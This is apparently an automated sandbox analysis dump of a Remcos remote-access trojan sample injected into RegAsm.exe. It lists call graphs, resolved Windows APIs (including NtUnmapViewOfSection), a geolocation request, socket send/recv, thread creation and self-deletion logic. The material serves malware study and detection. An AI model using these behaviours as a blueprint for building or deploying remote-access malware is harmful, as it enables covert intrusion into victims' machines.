48870->48897 48871->48877 48871->48883 48898 41fb6c 52 API calls 48871->48898 48872->48877 48902 426155 28 API calls 48872->48902 48873->48877 48873->48879 48900 41fb6c 52 API calls 48873->48900 48874->48872 48874->48877 48885 425ae1 48874->48885 48879->48874 48901 4256f0 21 API calls 48879->48901 48883->48873 48883->48877 48899 424edd 49 API calls _Yarn 48883->48899 48886 425b00 ___scrt_get_show_window_mode 48885->48886 48888 425b0f 48886->48888 48891 425b34 48886->48891 48903 41ebbb 21 API calls 48886->48903 48888->48891 48896 425b14 48888->48896 48904 4205d8 46 API calls 48888->48904 48891->48872 48892 425b1d 48892->48891 48907 424d05 21 API calls 2 library calls 48892->48907 48894 425bb7 48894->48891 48905 432ec4 21 API calls _Yarn 48894->48905 48896->48891 48896->48892 48906 41da5f 49 API calls 48896->48906 48897->48871 48898->48871 48899->48873 48900->48873 48901->48874 48902->48877 48903->48888 48904->48894 48905->48896 48906->48892 48907->48891 48908 415d06 48923 41b380 48908->48923 48910 415d0f 48911 4020f6 28 API calls 48910->48911 48912 415d1e 48911->48912 48934 404aa1 61 API calls _Yarn 48912->48934 48914 415d2a 48915 417089 48914->48915 48916 401fd8 11 API calls 48914->48916 48917 401e8d 11 API calls 48915->48917 48916->48915 48918 417092 48917->48918 48919 401fd8 11 API calls 48918->48919 48920 41709e 48919->48920 48921 401fd8 11 API calls 48920->48921 48922 4170aa 48921->48922 48924 4020df 11 API calls 48923->48924 48925 41b38e 48924->48925 48926 43bd51 _Yarn 21 API calls 48925->48926 48927 41b39e InternetOpenW InternetOpenUrlW 48926->48927 48928 41b3c5 InternetReadFile 48927->48928 48932 41b3e8 48928->48932 48929 4020b7 28 API calls 48929->48932 48930 41b415 InternetCloseHandle InternetCloseHandle 48931 41b427 48930->48931 48931->48910 48932->48928 48932->48929 48932->48930 48933 401fd8 11 API calls 48932->48933 48933->48932 48934->48914 48935 426c4b 48940 426cc8 send 48935->48940 48941 43be58 48943 43be64 _swprintf ___DestructExceptionObject 48941->48943 48942 43be72 48957 4405dd 20 API calls __dosmaperr 48942->48957 48943->48942 48946 43be9c 48943->48946 48945 43be77 pre_c_initialization ___DestructExceptionObject 48952 445888 EnterCriticalSection 48946->48952 48948 43bea7 48953 43bf48 48948->48953 48952->48948 48955 43bf56 48953->48955 48954 43beb2 48958 43becf LeaveCriticalSection std::_Lockit::~_Lockit 48954->48958 48955->48954 48959 44976c 37 API calls 2 library calls 48955->48959 48957->48945 48958->48945 48959->48955 48960 41dfbd 48961 41dfd2 _Yarn ___scrt_get_show_window_mode 48960->48961 48962 41e1d5 48961->48962 48979 432ec4 21 API calls _Yarn 48961->48979 48968 41e189 48962->48968 48974 41db62 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_get_show_window_mode 48962->48974 48965 41e1e6 48965->48968 48975 432ec4 21 API calls _Yarn 48965->48975 48967 41e182 ___scrt_get_show_window_mode 48967->48968 48980 432ec4 21 API calls _Yarn 48967->48980 48970 41e21f ___scrt_get_show_window_mode 48970->48968 48976 43354a 48970->48976 48972 41e1af ___scrt_get_show_window_mode 48972->48968 48981 432ec4 21 API calls _Yarn 48972->48981 48974->48965 48975->48970 48982 433469 48976->48982 48978 433552 48978->48968 48979->48967 48980->48972 48981->48962 48983 433482 48982->48983 48984 433478 48982->48984 48983->48984 48988 432ec4 21 API calls _Yarn 48983->48988 48984->48978 48986 4334a3 48986->48984 48989 433837 CryptAcquireContextA 48986->48989 48988->48986 48990 433858 CryptGenRandom 48989->48990 48991 433853 48989->48991 48990->48991 48992 43386d CryptReleaseContext 48990->48992 48991->48984 48992->48991 48993 40165e 48994 401666 48993->48994 48996 401669 48993->48996 48995 4016a8 48997 4344ea new 22 API calls 48995->48997 48996->48995 48998 401696 48996->48998 48999 40169c 48997->48999 49000 4344ea new 22 API calls 48998->49000 49000->48999 49001 426bdc 49007 426cb1 recv 49001->49007 49008 42f8ed 49009 42f8f8 49008->49009 49010 42f90c 49009->49010 49012 432eee 49009->49012 49013 432efd 49012->49013 49015 432ef9 49012->49015 49016 440f0d 49013->49016 49015->49010 49017 446185 49016->49017 49018 446192 49017->49018 49019 44619d 49017->49019 49029 446137 21 API calls 3 library calls 49018->49029 49020 4461a5 49019->49020 49027 4461ae __Getctype 49019->49027 49022 446782 _free 20 API calls 49020->49022 49025 44619a 49022->49025 49023 4461b3 49030 4405dd 20 API calls __dosmaperr 49023->49030 49024 4461d8 RtlReAllocateHeap 49024->49025 49024->49027 49025->49015 49027->49023 49027->49024 49031 442f80 7 API calls 2 library calls 49027->49031 49029->49025 49030->49025 49031->49027

                                  Control-flow Graph

                                  APIs
                                  • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                  • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                  • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                  • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                  • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                  • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                  • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                  • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                  • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC86
                                  • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040E9E1), ref: 0041CC97
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CC9A
                                  • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040E9E1), ref: 0041CCA7
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCAA
                                  • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040E9E1), ref: 0041CCB7
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCBA
                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040E9E1), ref: 0041CCCC
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCCF
                                  • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040E9E1), ref: 0041CCDC
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCDF
                                  • GetModuleHandleA.KERNEL32(ntdll,NtQueryInformationProcess,?,?,?,?,0040E9E1), ref: 0041CCF0
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CCF3
                                  • GetModuleHandleA.KERNEL32(kernel32,GetFinalPathNameByHandleW,?,?,?,?,0040E9E1), ref: 0041CD04
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD07
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmStartSession,?,?,?,?,0040E9E1), ref: 0041CD19
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD1C
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmRegisterResources,?,?,?,?,0040E9E1), ref: 0041CD29
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD2C
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmGetList,?,?,?,?,0040E9E1), ref: 0041CD39
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD3C
                                  • LoadLibraryA.KERNEL32(Rstrtmgr,RmEndSession,?,?,?,?,0040E9E1), ref: 0041CD49
                                  • GetProcAddress.KERNEL32(00000000), ref: 0041CD4C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad$HandleModule
                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetFinalPathNameByHandleW$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtQueryInformationProcess$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$RmEndSession$RmGetList$RmRegisterResources$RmStartSession$Rstrtmgr$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                  • API String ID: 4236061018-3687161714
                                  • Opcode ID: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                  • Instruction ID: 43d5c3d51f8f0173c8b3474e0c84bdc355f07b7b5b23ff39ae26555794408ecb
                                  • Opcode Fuzzy Hash: d30ec231acb52cdcc59a2b6b3fe3a558d95728f00a5c8bab653e1e11384c1c5d
                                  • Instruction Fuzzy Hash: 31419EA0EC035879DA107BB66DCDE3B3E5CD9857953214837B15CA7150EBBCD8408EAE

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1082 41b380-41b3c3 call 4020df call 43bd51 InternetOpenW InternetOpenUrlW 1087 41b3c5-41b3e6 InternetReadFile 1082->1087 1088 41b3e8-41b408 call 4020b7 call 403376 call 401fd8 1087->1088 1089 41b40c-41b40f 1087->1089 1088->1089 1091 41b411-41b413 1089->1091 1092 41b415-41b422 InternetCloseHandle * 2 call 43bd4c 1089->1092 1091->1087 1091->1092 1096 41b427-41b431 1092->1096
                                  APIs
                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                  • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                  • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                  Strings
                                  • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleOpen$FileRead
                                  • String ID: http://geoplugin.net/json.gp
                                  • API String ID: 3121278467-91888290
                                  • Opcode ID: cdafa812d0069ca1bd3c44b07efc9bb2dcc90a2ad610c892a77a7760868e404d
                                  • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                  • Opcode Fuzzy Hash: cdafa812d0069ca1bd3c44b07efc9bb2dcc90a2ad610c892a77a7760868e404d
                                  • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                    • Part of subcall function 00413549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                    • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                  • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                  • ExitProcess.KERNEL32 ref: 0040F8CA
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                  • String ID: 5.0.0 Pro$override$pth_unenc
                                  • API String ID: 2281282204-3992771774
                                  • Opcode ID: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                  • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                  • Opcode Fuzzy Hash: b93807ab3ce0d5bba4bd1ccb9a8b41d40f094000d2685bb717fd1cbe92334c8f
                                  • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1265 404f51-404f5f 1266 404f65-404f6c 1265->1266 1267 404fea 1265->1267 1269 404f74-404f7b 1266->1269 1270 404f6e-404f72 1266->1270 1268 404fec-404ff1 1267->1268 1271 404fc0-404fe8 CreateEventA CreateThread 1269->1271 1272 404f7d-404fbb GetLocalTime call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1269->1272 1270->1271 1271->1268 1272->1271
                                  APIs
                                  • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                  Strings
                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Create$EventLocalThreadTime
                                  • String ID: KeepAlive | Enabled | Timeout:
                                  • API String ID: 2532271599-1507639952
                                  • Opcode ID: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
                                  • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                  • Opcode Fuzzy Hash: 27b858f6950e3623d995e23d6d4fe1d77f4f118926dc16c8cee4ff6bd928c013
                                  • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                  APIs
                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,01255578), ref: 00433849
                                  • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                  • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Crypt$Context$AcquireRandomRelease
                                  • String ID:
                                  • API String ID: 1815803762-0
                                  • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                  • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                  • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                  • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                  APIs
                                  • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
                                  • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Name$ComputerUser
                                  • String ID:
                                  • API String ID: 4229901323-0
                                  • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                  • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                  • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                  • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                  APIs
                                  • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,5.0.0 Pro), ref: 0040F8E5
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: InfoLocale
                                  • String ID:
                                  • API String ID: 2299586839-0
                                  • Opcode ID: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                  • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                  • Opcode Fuzzy Hash: 6e7e1272b5dd4961ec291f7251087c477c276ff70ea579fe19356fd9f5958aa4
                                  • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 5 40e9c5-40ea47 call 41cb50 GetModuleFileNameW call 40f3c3 call 4020f6 * 2 call 41be1b call 40fb17 call 401e8d call 43fd00 22 40ea93-40eb5b call 401e65 call 401fab call 401e65 call 40531e call 406383 call 401fe2 call 401fd8 * 2 call 401e65 call 401fc0 call 405aa6 call 401e65 call 4051e3 call 401e65 call 4051e3 5->22 23 40ea49-40ea8e call 40fbb3 call 401e65 call 401fab call 410f37 call 40fb64 call 40f3b0 5->23 69 40eb5d-40eba8 call 406c1e call 401fe2 call 401fd8 call 401fab call 413549 22->69 70 40ebae-40ebc9 call 401e65 call 40b9bd 22->70 49 40eef2-40ef03 call 401fd8 23->49 69->70 102 40f34f-40f36a call 401fab call 4139a9 call 412475 69->102 79 40ec03-40ec0a call 40d069 70->79 80 40ebcb-40ebea call 401fab call 413549 70->80 88 40ec13-40ec1a 79->88 89 40ec0c-40ec0e 79->89 80->79 98 40ebec-40ec02 call 401fab call 4139a9 80->98 93 40ec1c 88->93 94 40ec1e-40ec2a call 41b2c3 88->94 92 40eef1 89->92 92->49 93->94 103 40ec33-40ec37 94->103 104 40ec2c-40ec2e 94->104 98->79 124 40f36f-40f3a0 call 41bc5e call 401f04 call 413a23 call 401f09 * 2 102->124 108 40ec76-40ec89 call 401e65 call 401fab 103->108 109 40ec39 call 407716 103->109 104->103 127 40ec90-40ed18 call 401e65 call 41bc5e call 401f13 call 401f09 call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab 108->127 128 40ec8b call 407755 108->128 118 40ec3e-40ec40 109->118 121 40ec42-40ec47 call 407738 call 407260 118->121 122 40ec4c-40ec5f call 401e65 call 401fab 118->122 121->122 122->108 141 40ec61-40ec67 122->141 157 40f3a5-40f3af call 40dd42 call 414f2a 124->157 177 40ed80-40ed84 127->177 178 40ed1a-40ed33 call 401e65 call 401fab call 43bad6 127->178 128->127 141->108 144 40ec69-40ec6f 141->144 144->108 147 40ec71 call 407260 144->147 147->108 179 40ef06-40ef66 call 436e90 call 40247c call 401fab * 2 call 4136f8 call 409057 177->179 180 40ed8a-40ed91 177->180 178->177 202 40ed35-40ed7b call 401e65 call 401fab call 401e65 call 401fab call 40da34 call 401f13 call 401f09 178->202 233 40ef6b-40efbf call 401e65 call 401fab call 402093 call 401fab call 41376f call 401e65 call 401fab call 43baac 179->233 182 40ed93-40ee0d call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 40cdf9 180->182 183 40ee0f-40ee19 call 409057 180->183 192 40ee1e-40ee42 call 40247c call 434798 182->192 183->192 210 40ee51 192->210 211 40ee44-40ee4f call 436e90 192->211 202->177 216 40ee53-40ee9e call 401f04 call 43f809 call 40247c call 401fab call 40247c call 401fab call 413947 210->216 211->216 271 40eea3-40eec8 call 4347a1 call 401e65 call 40b9bd 216->271 286 40efc1 233->286 287 40efdc-40efde 233->287 271->233 288 40eece-40eeed call 401e65 call 41bc5e call 40f474 271->288 289 40efc3-40efda call 41cd9b CreateThread 286->289 290 40efe0-40efe2 287->290 291 40efe4 287->291 288->233 306 40eeef 288->306 294 40efea-40f0c6 call 402093 * 2 call 41b4ef call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 43baac call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab call 401e65 call 401fab StrToIntA call 409de4 call 401e65 call 401fab 289->294 290->289 291->294 344 40f101 294->344 345 40f0c8-40f0ff call 4344ea call 401e65 call 401fab CreateThread 294->345 306->92 347 40f103-40f11b call 401e65 call 401fab 344->347 345->347 356 40f159-40f16c call 401e65 call 401fab 347->356 357 40f11d-40f154 call 4344ea call 401e65 call 401fab CreateThread 347->357 368 40f1cc-40f1df call 401e65 call 401fab 356->368 369 40f16e-40f1c7 call 401e65 call 401fab call 401e65 call 401fab call 40d9e8 call 401f13 call 401f09 CreateThread 356->369 357->356 379 40f1e1-40f215 call 401e65 call 401fab call 401e65 call 401fab call 43baac call 40c162 368->379 380 40f21a-40f23e call 41b60d call 401f13 call 401f09 368->380 369->368 379->380 400 40f240-40f241 SetProcessDEPPolicy 380->400 401 40f243-40f256 CreateThread 380->401 400->401 404 40f264-40f26b 401->404 405 40f258-40f262 CreateThread 401->405 408 40f279-40f280 404->408 409 40f26d-40f277 CreateThread 404->409 405->404 412 40f282-40f285 408->412 413 40f28e 408->413 409->408 415 40f287-40f28c 412->415 416 40f2cc-40f2df call 401fab call 4134ff 412->416 418 40f293-40f2c7 call 402093 call 4052fd call 402093 call 41b4ef call 401fd8 413->418 415->418 426 40f2e4-40f2e7 416->426 418->416 426->157 428 40f2ed-40f32d call 41bc5e call 401f04 call 41361b call 401f09 call 401f04 426->428 443 40f346-40f34b DeleteFileW 428->443 444 40f34d 443->444 445 40f32f-40f332 443->445 444->124 445->124 446 40f334-40f341 Sleep call 401f04 445->446 446->443
                                  APIs
                                    • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB65
                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB6E
                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040E9E1), ref: 0041CB85
                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB88
                                    • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CB9A
                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CB9D
                                    • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040E9E1), ref: 0041CBAE
                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBB1
                                    • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040E9E1), ref: 0041CBC3
                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBC6
                                    • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040E9E1), ref: 0041CBD2
                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBD5
                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E9E1), ref: 0041CBE6
                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                    • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                    • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                    • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                    • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040E9EE
                                    • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.2484502723.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                  • String ID: SG$ SG$8SG$8SG$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Inj$PSG$Remcos Agent initialized$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                  • API String ID: 2830904901-3701325316
                                  • Opcode ID: 6efa3f621475a76947be1f850958e273712f281ed2ed982da2c4c90c201e71a1
                                  • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                  • Opcode Fuzzy Hash: 6efa3f621475a76947be1f850958e273712f281ed2ed982da2c4c90c201e71a1
